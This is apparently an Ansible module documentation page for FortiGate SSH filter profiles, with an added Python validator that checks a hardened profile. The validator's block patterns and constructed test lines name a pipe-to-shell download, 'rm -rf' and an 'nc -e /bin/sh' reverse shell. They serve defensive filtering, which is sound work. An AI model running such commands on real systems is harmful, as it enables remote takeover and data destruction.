lix_fortinet.fortios.fortios_ssh_filter_profile (102.2.120) — module

Configure SSH filter profile in Fortinet's FortiOS and FortiGate.

Added in version 2.0.0 of lix_fortinet.fortios

Authors: Link Zheng (@chillancezen), Jie Xue (@JieX19), Hongbin Lu (@fgtdev-hblu), Frank Shen (@frankshen01), Miguel Angel Munoz (@mamunozgonzalez), Nicolas Thomas (@thomnico)

preview | supported by community

Install collection

Install with ansible-galaxy collection install lix_fortinet.fortios:==102.2.120


Add to requirements.yml

  collections:
    - name: lix_fortinet.fortios
      version: 102.2.120

Description

This module configures a FortiGate or FortiOS (FOS) device by creating, modifying or removing objects in the ssh_filter feature, profile category (an SSH filter profile). The usage example lists every parameter; the values are placeholders and must be adjusted to your own datasources before use. Tested with FOS v6.0.0.


Requirements

Usage examples

- hosts: fortigates
  collections:
    - lix_fortinet.fortios
  connection: httpapi
  vars:
    vdom: "root"
    ansible_httpapi_use_ssl: yes
    # "no" skips verification of the FortiGate's TLS certificate, so an on-path
    # attacker presenting any certificate can read the access token. Acceptable
    # only for lab devices with self-signed certificates; use "yes" elsewhere.
    ansible_httpapi_validate_certs: no
    ansible_httpapi_port: 443
  tasks:
    - name: Configure SSH filter profile.
      fortios_ssh_filter_profile:
        vdom: "{{ vdom }}"
        state: "present"
        # REST API token generated in the FortiGate GUI; keep it in Ansible Vault
        # or an external variable rather than in the playbook file.
        access_token: "<your_own_value>"
        ssh_filter_profile:
          # block and log take lists of SSH channel types (see Inputs); a single
          # string is accepted and treated as a one-element list.
          block: "x11"
          default_command_log: "enable"
          file_filter:
            entries:
              - action: "log"
                comment: "Comment."
                direction: "incoming"
                file_type:
                  - name: "default_name_11 (source antivirus.filetype.name)"
                filter: "<your_own_value>"
                password_protected: "yes"
                protocol: "ssh"
            log: "enable"
            scan_archive_contents: "enable"
            status: "enable"
          log: "x11"
          name: "default_name_19"
          shell_commands:
            - action: "block"
              alert: "enable"
              id: "23"
              log: "enable"
              pattern: "<your_own_value>"
              severity: "low"
              type: "simple"

Inputs

    
vdom:
    default: root
    description:
    - Virtual domain, among those defined previously. A vdom is a virtual instance of
      the FortiGate that can be configured and used as a different unit.
    type: str

state:
    choices:
    - present
    - absent
    description:
    - Indicates whether to create or remove the object.
    required: true
    type: str

enable_log:
    default: false
    description:
    - Enable/Disable logging for task.
    required: false
    type: bool

member_path:
    description:
    - Member attribute path to operate on.
    - Delimited by a slash character when the path has more than one attribute.
    - Only parameters marked with member_path support member operations.
    type: str

access_token:
    description:
    - Token-based authentication. The token is generated from the GUI of the FortiGate; store it in Ansible Vault or pass it as a variable rather than writing it into the playbook.
    required: false
    type: str

member_state:
    choices:
    - present
    - absent
    description:
    - Add or delete a member under specified attribute path.
    - When member_state is specified, the state option is ignored.
    type: str

ssh_filter_profile:
    default: null
    description:
    - Configure SSH filter profile.
    suboptions:
      block:
        choices:
        - x11
        - shell
        - exec
        - port-forward
        - tun-forward
        - sftp
        - scp
        - unknown
        description:
        - SSH blocking options.
        elements: str
        type: list
      default_command_log:
        choices:
        - enable
        - disable
        description:
        - Enable/disable logging unmatched shell commands.
        type: str
      file_filter:
        description:
        - File filter.
        suboptions:
          entries:
            description:
            - File filter entries.
            elements: dict
            suboptions:
              action:
                choices:
                - log
                - block
                description:
                - Action taken for matched file.
                type: str
              comment:
                description:
                - Comment.
                type: str
              direction:
                choices:
                - incoming
                - outgoing
                - any
                description:
                - Match files transmitted in the session's originating or reply direction.
                type: str
              file_type:
                description:
                - Select file type.
                elements: dict
                suboptions:
                  name:
                    description:
                    - File type name. Source antivirus.filetype.name.
                    type: str
                type: list
              filter:
                description:
                - Add a file filter.
                type: str
              password_protected:
                choices:
                - 'yes'
                - any
                description:
                - Match password-protected files.
                type: str
              protocol:
                choices:
                - ssh
                description:
                - Protocol the entry applies to.
                elements: str
                type: list
            type: list
          log:
            choices:
            - enable
            - disable
            description:
            - Enable/disable file filter logging.
            type: str
          scan_archive_contents:
            choices:
            - enable
            - disable
            description:
            - Enable/disable file filter archive contents scan.
            type: str
          status:
            choices:
            - enable
            - disable
            description:
            - Enable/disable file filter.
            type: str
        type: dict
      log:
        choices:
        - x11
        - shell
        - exec
        - port-forward
        - tun-forward
        - sftp
        - scp
        - unknown
        description:
        - SSH logging options.
        elements: str
        type: list
      name:
        description:
        - SSH filter profile name.
        required: true
        type: str
      shell_commands:
        description:
        - SSH command filter.
        elements: dict
        suboptions:
          action:
            choices:
            - block
            - allow
            description:
            - Action to take for SSH shell command matches.
            type: str
          alert:
            choices:
            - enable
            - disable
            description:
            - Enable/disable alert.
            type: str
          id:
            description:
            - Entry ID (must be unique within the profile).
            type: int
          log:
            choices:
            - enable
            - disable
            description:
            - Enable/disable logging.
            type: str
          pattern:
            description:
            - SSH shell command pattern.
            type: str
          severity:
            choices:
            - low
            - medium
            - high
            - critical
            description:
            - Log severity.
            type: str
          type:
            choices:
            - simple
            - regex
            description:
            - Matching type.
            type: str
        type: list
    type: dict
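The option list above is what the module accepts, but a misspelled choice (for example `port_forward` instead of `port-forward`) or an invalid regex in `shell_commands` only surfaces when the task runs against the device. The following added example, which is not part of the lix_fortinet.fortios collection, builds a hardened profile in exactly the shape the `ssh_filter_profile` option expects, checks every field against the documented choices, and runs the `shell_commands` patterns over a few constructed command lines so the patterns can be reviewed before the playbook runs. The profile name, the patterns and the sample commands are illustrative; treating `type: regex` patterns as Python `re` syntax and `type: simple` patterns as substring matches is an assumption about the device's matching behaviour, and the FortiGate remains the authority on what it accepts.

```python
"""Pre-flight check for a fortios_ssh_filter_profile payload.

Added example, not code from the lix_fortinet.fortios collection.
Assumptions (not stated by the module docs): the FortiGate evaluates
``type: regex`` patterns in a dialect close to Python's ``re`` and
``type: simple`` patterns as plain substrings.
"""
import re

# Allowed values, copied from the module's documented choices.
SSH_OPTIONS = {"x11", "shell", "exec", "port-forward", "tun-forward",
               "sftp", "scp", "unknown"}
ENABLE_DISABLE = {"enable", "disable"}
CMD_ACTIONS = {"block", "allow"}
SEVERITIES = {"low", "medium", "high", "critical"}
CMD_TYPES = {"simple", "regex"}

# Hardened profile (illustrative name and patterns): only file transfer is
# allowed, every channel type is logged, interactive shells and forwarding
# are blocked, and unmatched commands are still logged.
HARDENED_PROFILE = {
    "name": "ssh-files-only",
    "block": ["x11", "shell", "exec", "port-forward", "tun-forward", "unknown"],
    "log": sorted(SSH_OPTIONS),
    "default_command_log": "enable",
    "shell_commands": [
        {"id": 1, "type": "regex",
         "pattern": r"\brm\s+-[a-zA-Z]*(r[a-zA-Z]*f|f[a-zA-Z]*r)[a-zA-Z]*\b",
         "action": "block", "log": "enable", "alert": "enable", "severity": "critical"},
        {"id": 2, "type": "regex", "pattern": r"\b(curl|wget)\b.*\|\s*(ba)?sh\b",
         "action": "block", "log": "enable", "alert": "enable", "severity": "high"},
        {"id": 3, "type": "simple", "pattern": "nc -e",
         "action": "block", "log": "enable", "alert": "disable", "severity": "high"},
    ],
}


def _as_list(value):
    """The module accepts a single string for list options; normalise it."""
    return [value] if isinstance(value, str) else list(value or [])


def validate_profile(profile):
    """Return a list of problems; an empty list means every option name and
    choice matches the module documentation and all regexes compile."""
    errors = []
    if not profile.get("name"):
        errors.append("name is required")
    for key in ("block", "log"):
        bad = set(_as_list(profile.get(key))) - SSH_OPTIONS
        if bad:
            errors.append(f"{key}: unknown values {sorted(bad)}")
    if profile.get("default_command_log", "enable") not in ENABLE_DISABLE:
        errors.append("default_command_log must be enable/disable")
    seen_ids = set()
    for cmd in profile.get("shell_commands", []):
        cid = cmd.get("id")
        if not isinstance(cid, int) or cid in seen_ids:
            errors.append(f"shell_commands: missing or duplicate id {cid!r}")
        seen_ids.add(cid)
        if cmd.get("action") not in CMD_ACTIONS:
            errors.append(f"shell_commands[{cid}]: action must be block/allow")
        if cmd.get("type") not in CMD_TYPES:
            errors.append(f"shell_commands[{cid}]: type must be simple/regex")
        if cmd.get("severity", "low") not in SEVERITIES:
            errors.append(f"shell_commands[{cid}]: bad severity")
        for flag in ("log", "alert"):
            if cmd.get(flag, "enable") not in ENABLE_DISABLE:
                errors.append(f"shell_commands[{cid}]: {flag} must be enable/disable")
        if cmd.get("type") == "regex":
            try:
                re.compile(cmd.get("pattern", ""))
            except re.error as exc:
                errors.append(f"shell_commands[{cid}]: bad regex: {exc}")
        elif not cmd.get("pattern"):
            errors.append(f"shell_commands[{cid}]: empty pattern")
    return errors


def first_matching_command(profile, command_line):
    """Return (id, action) of the first shell_commands entry that matches the
    command line, or None. Local approximation of device matching (assumption)."""
    for cmd in profile.get("shell_commands", []):
        if cmd["type"] == "regex":
            hit = re.search(cmd["pattern"], command_line) is not None
        else:
            hit = cmd["pattern"] in command_line
        if hit:
            return cmd["id"], cmd["action"]
    return None


def to_task_args(profile, vdom="root"):
    """Shape the profile as the module's task arguments (state: present)."""
    return {"vdom": vdom, "state": "present", "ssh_filter_profile": profile}


if __name__ == "__main__":
    print("problems:", validate_profile(HARDENED_PROFILE))
    # Constructed sample command lines, not captured traffic.
    for sample in ("rm -rf /var/log", "curl http://x/a.sh | sh", "ls -la",
                   "nc -e /bin/sh 10.0.0.1 4444"):
        print(f"{sample!r:40} -> {first_matching_command(HARDENED_PROFILE, sample)}")
```

The dictionary returned by `to_task_args` can be written out as YAML and passed to the task with `args:`, so the same data that was checked here is what reaches the device; the module's own `http_status` and `status` return values still need to be inspected for the result of the actual call.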

Outputs

build:
  description: Build number of the fortigate image
  returned: always
  sample: '1547'
  type: str
http_method:
  description: Last method used to provision the content into FortiGate
  returned: always
  sample: PUT
  type: str
http_status:
  description: Last result given by FortiGate on last operation applied
  returned: always
  sample: '200'
  type: str
mkey:
  description: Master key (id) used in the last call to FortiGate
  returned: success
  sample: id
  type: str
name:
  description: Name of the table used to fulfill the request
  returned: always
  sample: urlfilter
  type: str
path:
  description: Path of the table used to fulfill the request
  returned: always
  sample: webfilter
  type: str
revision:
  description: Internal revision number
  returned: always
  sample: 17.0.2.10658
  type: str
serial:
  description: Serial number of the unit
  returned: always
  sample: FGVMEVYYQT3AB5352
  type: str
status:
  description: Indication of the operation's result
  returned: always
  sample: success
  type: str
vdom:
  description: Virtual domain used
  returned: always
  sample: root
  type: str
version:
  description: Version of the FortiGate
  returned: always
  sample: v5.6.3
  type: str